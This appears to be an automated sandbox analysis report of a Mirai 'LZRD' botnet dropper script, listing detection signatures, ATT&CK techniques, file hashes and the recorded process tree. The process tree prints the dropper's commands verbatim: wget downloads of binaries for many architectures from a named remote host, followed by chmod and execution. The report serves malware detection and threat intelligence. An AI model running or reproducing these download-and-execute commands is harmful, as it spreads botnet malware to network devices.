mirai | 27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e

Analysis

max time kernel
23s
max time network
31s
platform
linux_mips
resource
debian9-mipsbe-en-20211208
resource tags

arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
30-04-2023 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

D.sh
Size

1KB
MD5

e41b9523a8373b79498bef2473723adf
SHA1

bd468f9718ef86d34c88552dd01464f85e8e2ee5
SHA256

27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
SHA512

0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476

Score

10^/10

mirai lzrd botnet upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.

Impair Defenses
T1562
Writes file to system bin folder 1 TTPs 2 IoCs

Hijack Execution Flow
T1574

Processes:

description ioc

File opened for modification /sbin/watchdog
File opened for modification /bin/watchdog
Executes dropped EXE 9 IoCs

Processes:

wgetcatcatchmodBTwgetcat

pid process

332 wget
338 cat
346 cat
352 chmod
358 BT
364 wget
370 cat
376
382

description	ioc
File opened for modification	/sbin/watchdog
File opened for modification	/bin/watchdog

pid	process
332	wget
338	cat
346	cat
352	chmod
358	BT
364	wget
370	cat
376
382

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
/tmp/x86	upx
/tmp/BT	upx
/tmp/mips	upx
/tmp/BT	upx
/tmp/x86_64	upx
/tmp/BT	upx
/tmp/mpsl	upx
/tmp/BT	upx
/tmp/arm	upx
/tmp/BT	upx
/tmp/arm5	upx
/tmp/BT	upx
/tmp/arm6	upx
/tmp/BT	upx
/tmp/arm7	upx
/tmp/BT	upx
/tmp/ppc	upx
/tmp/BT	upx

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/mpsl	wget
File opened for modification	/tmp/arm	wget
File opened for modification	/tmp/arm7	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/BT
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/arm5	wget
File opened for modification	/tmp/arm6	wget

/tmp/D.sh
/tmp/D.sh
1⤵
PID:324

wget
wget http://ping.999apk.top/x86
2⤵
- Writes file to tmp directory
PID:325

cat
cat x86
2⤵
PID:330

chmod
chmod +x BT D.sh systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
2⤵
PID:331

./BT
./BT
2⤵
PID:332

wget
wget http://ping.999apk.top/mips
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:334

cat
cat mips
2⤵
PID:336

chmod
chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
2⤵
PID:337

./BT
./BT
2⤵
PID:338

wget
wget http://ping.999apk.top/arc
2⤵
PID:342

cat
cat arc
2⤵
- Executes dropped EXE
PID:344

chmod
chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
2⤵
PID:345

./BT
./BT
2⤵
PID:346

wget
wget http://ping.999apk.top/x86_64
2⤵
- Writes file to tmp directory
PID:348

cat
cat x86_64
2⤵
PID:350

chmod
chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:351

./BT
./BT
2⤵
PID:352

wget
wget http://ping.999apk.top/mpsl
2⤵
- Writes file to tmp directory
PID:354

cat
cat mpsl
2⤵
- Executes dropped EXE
PID:356

chmod
chmod +x BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:357

./BT
./BT
2⤵
PID:358

wget
wget http://ping.999apk.top/arm
2⤵
- Writes file to tmp directory
PID:360

cat
cat arm
2⤵
PID:362

chmod
chmod +x arm BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
- Executes dropped EXE
PID:363

./BT
./BT
2⤵
PID:364

wget
wget http://ping.999apk.top/arm5
2⤵
- Writes file to tmp directory
PID:366

cat
cat arm5
2⤵
PID:368

chmod
chmod +x arm arm5 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:369

./BT
./BT
2⤵
- Executes dropped EXE
PID:370

wget
wget http://ping.999apk.top/arm6
2⤵
- Writes file to tmp directory
PID:372

cat
cat arm6
2⤵
PID:374

chmod
chmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:375

./BT
./BT
2⤵
PID:376

wget
wget http://ping.999apk.top/arm7
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:378

cat
cat arm7
2⤵
PID:380

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:381

./BT
./BT
2⤵
PID:382

wget
wget http://ping.999apk.top/ppc
2⤵
- Writes file to tmp directory
PID:384

cat
cat ppc
2⤵
- Executes dropped EXE
PID:386

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
2⤵
PID:387

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Impair Defenses

T1562

Hijack Execution Flow

T1574

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BT
Filesize
21KB

MD5
0cb2516e0c4665363644396499cb7aec

SHA1
995fc2ab54085422d82676b252a2bab06cdf5704

SHA256
7113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1

SHA512
d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88

Download Submit
/tmp/BT
Filesize
18KB

MD5
0e6fe9b5313bd0deaffb51f2fbbe06cb

SHA1
6facd101542faf57dab7824909e0c3d29513da60

SHA256
3ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863

SHA512
43fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e

Download Submit
/tmp/BT
Filesize
26KB

MD5
67110fddb816519a3d5d352b5f32bbbb

SHA1
6a541fce786c16301901087977b30476920e3382

SHA256
14acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6

SHA512
f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35

Download Submit
/tmp/BT
Filesize
45KB

MD5
db3001dc744f15e5dfd694e26b57979c

SHA1
9fde5950b212a39e94e15ed3347cca61d514a95b

SHA256
076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e

SHA512
1d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731

Download Submit
/tmp/BT
Filesize
21KB

MD5
6260fc510dee1aef342de3bf2892bf7c

SHA1
4c5d1757ef56a3c4578f7db2949800b0a8b08005

SHA256
f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4

SHA512
b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72

Download Submit
/tmp/BT
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
/tmp/BT
Filesize
23KB

MD5
5ffea0b004a955d227e947d486ab573f

SHA1
de6fe607474109e92373ed4b6f54cb678e69f04f

SHA256
472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02

SHA512
93f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f

Download Submit
/tmp/BT
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
/tmp/BT
Filesize
24KB

MD5
d1d7efff7b9a9627879ceb1a79832a28

SHA1
5f88e33dec795ff429d2a44c7743d3bc948dcc19

SHA256
c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d

SHA512
301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c

Download Submit
/tmp/arm
Filesize
21KB

MD5
0cb2516e0c4665363644396499cb7aec

SHA1
995fc2ab54085422d82676b252a2bab06cdf5704

SHA256
7113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1

SHA512
d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88

Download Submit
/tmp/arm5
Filesize
18KB

MD5
0e6fe9b5313bd0deaffb51f2fbbe06cb

SHA1
6facd101542faf57dab7824909e0c3d29513da60

SHA256
3ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863

SHA512
43fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e

Download Submit
/tmp/arm6
Filesize
26KB

MD5
67110fddb816519a3d5d352b5f32bbbb

SHA1
6a541fce786c16301901087977b30476920e3382

SHA256
14acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6

SHA512
f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35

Download Submit
/tmp/arm7
Filesize
45KB

MD5
db3001dc744f15e5dfd694e26b57979c

SHA1
9fde5950b212a39e94e15ed3347cca61d514a95b

SHA256
076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e

SHA512
1d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731

Download Submit
/tmp/mips
Filesize
23KB

MD5
5ffea0b004a955d227e947d486ab573f

SHA1
de6fe607474109e92373ed4b6f54cb678e69f04f

SHA256
472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02

SHA512
93f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f

Download Submit
/tmp/mpsl
Filesize
24KB

MD5
d1d7efff7b9a9627879ceb1a79832a28

SHA1
5f88e33dec795ff429d2a44c7743d3bc948dcc19

SHA256
c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d

SHA512
301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c

Download Submit
/tmp/ppc
Filesize
21KB

MD5
6260fc510dee1aef342de3bf2892bf7c

SHA1
4c5d1757ef56a3c4578f7db2949800b0a8b08005

SHA256
f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4

SHA512
b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72

Download Submit
/tmp/x86
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
/tmp/x86_64
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
memory/338-1-0x00400000-0x00451a58-memory.dmp

Download